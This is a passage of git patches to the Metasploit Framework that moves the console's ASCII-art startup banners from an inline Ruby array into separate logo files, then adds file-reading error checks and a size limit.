mode 100644 lib/msf/ui/logos/r7-metasploit.txt create mode 100644 lib/msf/ui/logos/test.rb create mode 100644 lib/msf/ui/logos/wake-up-neo.txt create mode 100644 lib/msf/ui/logos/workflow-cartoon.txt diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index c30dc8cdf6f2..d02f48560cea 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -10,301 +10,41 @@ module Ui module Banner Logos = - [ -%Q{ -%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc - - Trace program: running - - wake up, Neo... - %bldthe matrix has you%clr - follow the white rabbit. - - knock, knock, Neo. - - (`. ,-, - ` `. ,;' / - `. ,'/ .' - `. X /.' - .-;--''--.._` ` ( - .' / ` - , ` ' Q ' - , , `._ \\ - ,.| ' `-.;_' - : . ` ; ` ` --,.._; - ' ` , ) .' - `._ , ' /_ - ; ,''-,;' ``- - ``-..__``--` -%clr}, - -%Q{%whi - _---------. - .' ####### ;." - .---,. ;@ @@`; .---,.. -." @@@@@'.,'@@ @@@@@',.'@@@@ ". -'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; - `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' - "--'.@@@ -.@ @ ,'- .'--" - ".@' ; @ @ `. ;' - |@@@@ @@@ @ . - ' @@@ @@ @@ , - `.@@@@ @@ . - ',@@ @ ; _____________ - ( 3 C ) /|___ / Metasploit! \\ - ;@'. __*__,." \\|--- \\_____________/ - '(.,...."/ -%clr}, -' -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% -%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% -%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% -%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% -%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -', -' - _ _ -/ \ /\ __ _ __ /_/ __ -| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ -| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| -|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ - |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ -', -%Q{ -%whiIIIIII %reddTb.dTb%clr _.---._ -%whi II %red4' v 'B%clr .'"".'/|\`.""'. -%whi II %red6. .P%clr : .' / | \ `. : -%whi II %red'T;. .;P'%clr '.' / | \ `.' -%whi II %red'T; ;P'%clr `. / | \ .' -%whiIIIIII %red'YvP'%clr `-.__|__.-' - -I love shells --egypt -}, -' - , , - / \ - ((__---,,,---__)) - (_) O O (_)_________ - \ _ / |\ - o_o \ M S F | \ - \ _____ | * - ||| WW||| - ||| ||| -', -' -# cowsay++ - ____________ -< metasploit > - ------------ - \ ,__, - \ (oo)____ - (__) )\ - ||--|| * -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld3Kom SuperHack II Logon%clr | -|______________________________________________________________________________| -| | -| | -| | -| User Name: [ %redsecurity%clr ] | -| | -| Password: [ ] | -| | -| | -| | -| %bld[ OK ]%clr | -|______________________________________________________________________________| -| | -|______________________________________________________________________________| -%clr -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | -|______________________________________________________________________________| - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr . %yel/%clr %yel/%clr x - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr %yel/%clr + %yel/%clr - %yel\%clr + %yel/%clr %yel/%clr - * %yel/%clr %yel/%clr - %yel/%clr . %yel/%clr - X %yel/%clr %yel/%clr X - %yel/%clr %red###%clr - %yel/%clr %red# %bld%%clr%red #%clr - %yel/%clr %red###%clr - . %yel/%clr - . %yel/%clr . %red*%clr . - %yel/%clr - * - + %red*%clr - - %bld^%clr -#### __ __ __ ####### __ __ __ #### -#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### -################################################################################ -################################################################################ -# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # -################################################################################ -%clr -', - - -' -%clr%whi -Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f -EFLAGS: 00010046 -eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 -esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 -ds: 0018 es: 0018 ss: 0018 -Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) - -%bld -Stack: 90909090990909090990909090 - 90909090990909090990909090 - 90909090.90909090.90909090 - 90909090.90909090.90909090 - 90909090.90909090.09090900 - 90909090.90909090.09090900 - .......................... - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - ccccccccc................. - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .................ccccccccc - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .......................... - ffffffffffffffffffffffffff - ffffffff.................. - ffffffffffffffffffffffffff - ffffffff.................. - ffffffff.................. - ffffffff.................. -%clr - -%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr -Aiee, Killing Interrupt handler -%redKernel panic: Attempted to kill the idle task! -In swapper task - not syncing -%clr -', -' -%clr -%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr -%bluMMMMMMMMMMM MMMMMMMMMM%clr -%bluMMMN$ vMMMM%clr -%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr -%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr -%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr -%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr -%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr -%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr -%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr -%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr -%clr -', -' -%clr ######## # - ################# # - ###################### # - ######################### # - ############################ - ############################## - ############################### - ############################### - ############################## - # ######## # - %red##%clr %red###%clr #### ## - ### ### - #### ### - #### ########## #### - ####################### #### - #################### #### - ################## #### - ############ ## - ######## ### - ######### ##### - ############ ###### - ######## ######### - ##### ######## - ### ######### - ###### ############ - ####################### - # # ### # # ## - ######################## - ## ## ## ## -%clr -', -%Q{ - %whi+-------------------------------------------------------+ - %whi| METASPLOIT by Rapid7 | - %whi+---------------------------+---------------------------+ - %whi| %blu__________________ %whi| | - %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| - %whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| - %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| - %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| - %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| - %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| - %whi| %blu// \\\\ %whi| %grn********************* %whi| - %whi+---------------------------+---------------------------+ - %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| - %whi| o O | %yel)%whi======%yel( %whi| - %whi| o | %yel.' %whiLOOT %yel'. %whi| - %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| - %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| - %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| - %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| - %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| - %whi+---------------------------+---------------------------+%clr - %clr -},] - - - + %w{ + wake-up-neo.txt + cow-head.txt + r7-metasploit.txt + figlet.txt + i-heart-shells.txt + branded-longhorn.txt + cowsay.txt + 3kom-superhack.txt + missile-command.txt + null-pointer-deref.txt + metasploit-shield.txt + ninja.txt + workflow.txt + } # # Returns a random metasploit logo. # + + def self.readfile(fname) + base = File.expand_path(File.dirname(__FILE__)) + File.open(File.join(base, "logos", fname)) {|f| f.read f.stat.size} + end + def self.to_s if ENV['GOCOW'] case rand(2) when 0 - Logos[1] + self.readfile Logos[1] when 1 - Logos[5] + self.readfile Logos[5] end else - Logos[rand(Logos.length)] + self.readfile Logos[rand(Logos.length)] end end diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt new file mode 100644 index 000000000000..a2097f972ae0 --- /dev/null +++ b/lib/msf/ui/logos/3kom-superhack.txt @@ -0,0 +1,19 @@ +%clr + ______________________________________________________________________________ +| | +| %bld3Kom SuperHack II Logon%clr | +|______________________________________________________________________________| +| | +| | +| | +| User Name: [ %redsecurity%clr ] | +| | +| Password: [ ] | +| | +| | +| | +| %bld[ OK ]%clr | +|______________________________________________________________________________| +| | +|______________________________________________________________________________| +%clr diff --git a/lib/msf/ui/logos/branded-longhorn.txt b/lib/msf/ui/logos/branded-longhorn.txt new file mode 100644 index 000000000000..df7e2f745f43 --- /dev/null +++ b/lib/msf/ui/logos/branded-longhorn.txt @@ -0,0 +1,10 @@ + + , , + / \ + ((__---,,,---__)) + (_) O O (_)_________ + \ _ / |\ + o_o \ M S F | \ + \ _____ | * + ||| WW||| + ||| ||| diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt new file mode 100644 index 000000000000..16ed1021d6b7 --- /dev/null +++ b/lib/msf/ui/logos/cow-head.txt @@ -0,0 +1,17 @@ +%whi + _---------. + .' ####### ;." + .---,. ;@ @@`; .---,.. +." @@@@@'.,'@@ @@@@@',.'@@@@ ". +'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; + `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' + "--'.@@@ -.@ @ ,'- .'--" + ".@' ; @ @ `. ;' + |@@@@ @@@ @ . + ' @@@ @@ @@ , + `.@@@@ @@ . + ',@@ @ ; _____________ + ( 3 C ) /|___ / Metasploit! \\ + ;@'. __*__,." \\|--- \\_____________/ + '(.,...."/ +%clr diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt new file mode 100644 index 000000000000..7b34488352fe --- /dev/null +++ b/lib/msf/ui/logos/cowsay.txt @@ -0,0 +1,10 @@ + +# cowsay++ + ____________ +< metasploit > + ------------ + \ ,__, + \ (oo)____ + (__) )\ + ||--|| * + diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt new file mode 100644 index 000000000000..1567ea1774f8 --- /dev/null +++ b/lib/msf/ui/logos/figlet.txt @@ -0,0 +1,7 @@ + _ _ +/ \ /\ __ _ __ /_/ __ +| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ +| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| +|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ + |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ + diff --git a/lib/msf/ui/logos/i-heart-shells.txt b/lib/msf/ui/logos/i-heart-shells.txt new file mode 100644 index 000000000000..aeaff31aaae3 --- /dev/null +++ b/lib/msf/ui/logos/i-heart-shells.txt @@ -0,0 +1,9 @@ +%whiIIIIII %reddTb.dTb%clr _.---._ +%whi II %red4' v 'B%clr .'"".'/|\`.""'. +%whi II %red6. .P%clr : .' / | \ `. : +%whi II %red'T;. .;P'%clr '.' / | \ `.' +%whi II %red'T; ;P'%clr `. / | \ .' +%whiIIIIII %red'YvP'%clr `-.__|__.-' + +I love shells --egypt + diff --git a/lib/msf/ui/logos/metasploit-shield.txt b/lib/msf/ui/logos/metasploit-shield.txt new file mode 100644 index 000000000000..7f8648754fe2 --- /dev/null +++ b/lib/msf/ui/logos/metasploit-shield.txt @@ -0,0 +1,22 @@ +%clr +%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr +%bluMMMMMMMMMMM MMMMMMMMMM%clr +%bluMMMN$ vMMMM%clr +%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr +%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr +%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr +%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr +%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr +%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr +%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr +%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr +%clr + diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt new file mode 100644 index 000000000000..1eda5e790a2e --- /dev/null +++ b/lib/msf/ui/logos/missile-command.txt @@ -0,0 +1,30 @@ +%clr + ______________________________________________________________________________ +| | +| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | +|______________________________________________________________________________| + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr . %yel/%clr %yel/%clr x + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr %yel/%clr + %yel/%clr + %yel\%clr + %yel/%clr %yel/%clr + * %yel/%clr %yel/%clr + %yel/%clr . %yel/%clr + X %yel/%clr %yel/%clr X + %yel/%clr %red###%clr + %yel/%clr %red# %bld%%clr%red #%clr + %yel/%clr %red###%clr + . %yel/%clr + . %yel/%clr . %red*%clr . + %yel/%clr + * + + %red*%clr + + %bld^%clr +#### __ __ __ ####### __ __ __ #### +#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### +################################################################################ +################################################################################ +# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # +################################################################################ +%clr diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt new file mode 100644 index 000000000000..d5aff31eb227 --- /dev/null +++ b/lib/msf/ui/logos/ninja.txt @@ -0,0 +1,31 @@ +%clr ######## # + ################# # + ###################### # + ######################### # + ############################ + ############################## + ############################### + ############################### + ############################## + # ######## # + %red##%clr %red###%clr #### ## + ### ### + #### ### + #### ########## #### + ####################### #### + #################### #### + ################## #### + ############ ## + ######## ### + ######### ##### + ############ ###### + ######## ######### + ##### ######## + ### ######### + ###### ############ + ####################### + # # ### # # ## + ######################## + ## ## ## ## +%clr + diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt new file mode 100644 index 000000000000..9a9c1fa0bbd6 --- /dev/null +++ b/lib/msf/ui/logos/null-pointer-deref.txt @@ -0,0 +1,38 @@ +%clr%whi +Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f +EFLAGS: 00010046 +eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 +esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 +ds: 0018 es: 0018 ss: 0018 +Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) + +%bld +Stack: 90909090990909090990909090 + 90909090990909090990909090 + 90909090.90909090.90909090 + 90909090.90909090.90909090 + 90909090.90909090.09090900 + 90909090.90909090.09090900 + .......................... + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + ccccccccc................. + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .................ccccccccc + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .......................... + ffffffffffffffffffffffffff + ffffffff.................. + ffffffffffffffffffffffffff + ffffffff.................. + ffffffff.................. + ffffffff.................. +%clr + +%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr +Aiee, Killing Interrupt handler +%redKernel panic: Attempted to kill the idle task! +In swapper task - not syncing +%clr diff --git a/lib/msf/ui/logos/r7-metasploit.txt b/lib/msf/ui/logos/r7-metasploit.txt new file mode 100644 index 000000000000..ca62faacf8e8 --- /dev/null +++ b/lib/msf/ui/logos/r7-metasploit.txt @@ -0,0 +1,16 @@ +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% +%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% +%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% +%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% +%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/lib/msf/ui/logos/test.rb b/lib/msf/ui/logos/test.rb new file mode 100644 index 000000000000..2a8e06341478 --- /dev/null +++ b/lib/msf/ui/logos/test.rb @@ -0,0 +1,5 @@ + +here = File.expand_path(File.dirname(__FILE__)) + +puts "Hi I live #{here}!" + diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt new file mode 100644 index 000000000000..e5606e1abdd0 --- /dev/null +++ b/lib/msf/ui/logos/wake-up-neo.txt @@ -0,0 +1,25 @@ +%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc + + Trace program: running + + wake up, Neo... + %bldthe matrix has you%clr + follow the white rabbit. + + knock, knock, Neo. + + (`. ,-, + ` `. ,;' / + `. ,'/ .' + `. X /.' + .-;--''--.._` ` ( + .' / ` + , ` ' Q ' + , , `._ \\ + ,.| ' `-.;_' + : . ` ; ` ` --,.._; + ' ` , ) .' + `._ , ' /_ + ; ,''-,;' ``- + ``-..__``--` +%clr diff --git a/lib/msf/ui/logos/workflow-cartoon.txt b/lib/msf/ui/logos/workflow-cartoon.txt new file mode 100644 index 000000000000..1437bb8eed0f --- /dev/null +++ b/lib/msf/ui/logos/workflow-cartoon.txt @@ -0,0 +1,22 @@ + %whi+-------------------------------------------------------+ + %whi| METASPLOIT by Rapid7 | + %whi+---------------------------+---------------------------+ + %whi| %blu__________________ %whi| | + %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| + %whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| + %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| + %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| + %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| + %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| + %whi| %blu// \\\\ %whi| %grn********************* %whi| + %whi+---------------------------+---------------------------+ + %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| + %whi| o O | %yel)%whi======%yel( %whi| + %whi| o | %yel.' %whiLOOT %yel'. %whi| + %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| + %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| + %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| + %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| + %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| + %whi+---------------------------+---------------------------+%clr + %clr From 12f0501f2f7254d100ad881bafbab6b5aa9999c5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 20:38:14 -0600 Subject: [PATCH 016/421] Add a little erorr checking, another cow --- lib/msf/ui/banner.rb | 11 +++++++++-- lib/msf/ui/web/r7-metasploit.txt | 17 +++++++++++++++++ 2 files changed, 26 insertions(+), 2 deletions(-) create mode 100644 lib/msf/ui/web/r7-metasploit.txt diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index d02f48560cea..f6fee11d1157 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -32,16 +32,23 @@ module Banner def self.readfile(fname) base = File.expand_path(File.dirname(__FILE__)) - File.open(File.join(base, "logos", fname)) {|f| f.read f.stat.size} + pathname = File.join(base, "logos", fname) + begin + fdata = File.open(pathname) {|f| f.read f.stat.size} + rescue SystemCallError + fdata = "" + end end def self.to_s if ENV['GOCOW'] - case rand(2) + case rand(3) when 0 self.readfile Logos[1] when 1 self.readfile Logos[5] + when 2 + self.readfile Logos[6] end else self.readfile Logos[rand(Logos.length)] diff --git a/lib/msf/ui/web/r7-metasploit.txt b/lib/msf/ui/web/r7-metasploit.txt new file mode 100644 index 000000000000..024a5853aca6 --- /dev/null +++ b/lib/msf/ui/web/r7-metasploit.txt @@ -0,0 +1,17 @@ +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% +%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% +%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% +%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% +%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% + From 6f26e9efb24a0936faf40c2a9b263b18b304af5b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 22:32:53 -0600 Subject: [PATCH 017/421] More banner sanity checking. --- lib/msf/ui/banner.rb | 8 ++++++-- .../{workflow-cartoon.txt => workflow.txt} | 0 lib/msf/ui/web/r7-metasploit.txt | 17 ----------------- 3 files changed, 6 insertions(+), 19 deletions(-) rename lib/msf/ui/logos/{workflow-cartoon.txt => workflow.txt} (100%) delete mode 100644 lib/msf/ui/web/r7-metasploit.txt diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index f6fee11d1157..5f53bef07e60 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -33,11 +33,15 @@ module Banner def self.readfile(fname) base = File.expand_path(File.dirname(__FILE__)) pathname = File.join(base, "logos", fname) + fdata = "<< Missing banner: #{fname} >>" begin + raise ArgumentError unless File.readable?(pathname) + raise ArgumentError unless File.stat(pathname).size < 4096 fdata = File.open(pathname) {|f| f.read f.stat.size} - rescue SystemCallError - fdata = "" + rescue SystemCallError, ArgumentError + nil end + return fdata end def self.to_s diff --git a/lib/msf/ui/logos/workflow-cartoon.txt b/lib/msf/ui/logos/workflow.txt similarity index 100% rename from lib/msf/ui/logos/workflow-cartoon.txt rename to lib/msf/ui/logos/workflow.txt diff --git a/lib/msf/ui/web/r7-metasploit.txt b/lib/msf/ui/web/r7-metasploit.txt deleted file mode 100644 index 024a5853aca6..000000000000 --- a/lib/msf/ui/web/r7-metasploit.txt +++ /dev/null @@ -1,17 +0,0 @@ 